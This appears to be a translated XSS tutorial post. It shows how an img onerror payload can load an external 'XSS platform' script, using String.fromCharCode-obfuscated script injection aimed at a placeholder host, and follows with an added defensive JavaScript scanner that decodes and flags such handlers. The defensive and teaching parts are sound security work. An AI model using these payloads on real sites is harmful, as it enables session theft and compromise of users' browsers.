XSS vulnerabilities: how to load an XSS platform link from inside a tag
<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
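Today a student asked how to load an XSS platform link from inside a tag, and whether writing the JS URL into the tag like this would execute. Answer: no. onerror is an inline event handler, so its value must be JavaScript code; it is not treated as the address of a script to load.
Solution: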
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">
Payload without quotes:
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>
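For triage on the defending side, the following added example (not part of the original post; the function names are hypothetical) extracts inline event handlers from an HTML fragment, decodes their String.fromCharCode calls, and flags handlers that create a script element with a remote src. The two samples are the payloads quoted above.

```javascript
// Added example for defenders; helper names are hypothetical.
// Samples are the two img payloads quoted in the post above.
const SAMPLE_QUOTED = '<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">';
const SAMPLE_UNQUOTED = '<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>';

// Replace each String.fromCharCode(n,n,...) call with the quoted string it yields.
function decodeCharCodes(js) {
  return js.replace(/String\.fromCharCode\(([\d\s,]+)\)/g, (_, args) => {
    const codes = args.split(',').map((n) => parseInt(n.trim(), 10));
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Collect on* attribute values: double-quoted, single-quoted, or
// unquoted (running up to the next whitespace or '>').
function extractHandlers(html) {
  const re = /[\s/"']on[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  for (const m of html.matchAll(re)) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Decode one handler and flag the "create <script>, point it at a remote URL" pattern.
function analyzeHandler(js) {
  const decoded = decodeCharCodes(js);
  const createsScript = /createElement\(\s*["']script["']\s*\)/i.test(decoded);
  const src = decoded.match(/\.src\s*=\s*["']((?:https?:)?\/\/[^"']+)["']/i);
  return {
    decoded,
    createsScript,
    remoteSrc: src ? src[1] : null,
    suspicious: createsScript && src !== null,
  };
}

// Analyze every inline event handler found in an HTML fragment.
function scan(html) {
  return extractHandlers(html).map(analyzeHandler);
}

for (const sample of [SAMPLE_QUOTED, SAMPLE_UNQUOTED]) {
  console.log(scan(sample));
}
```

A regex scan like this suits log or submission triage; it does not replace output encoding or a Content-Security-Policy that disallows inline event handlers.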
ZP training: https://www.zygx8.com/thread-10128-1-1.html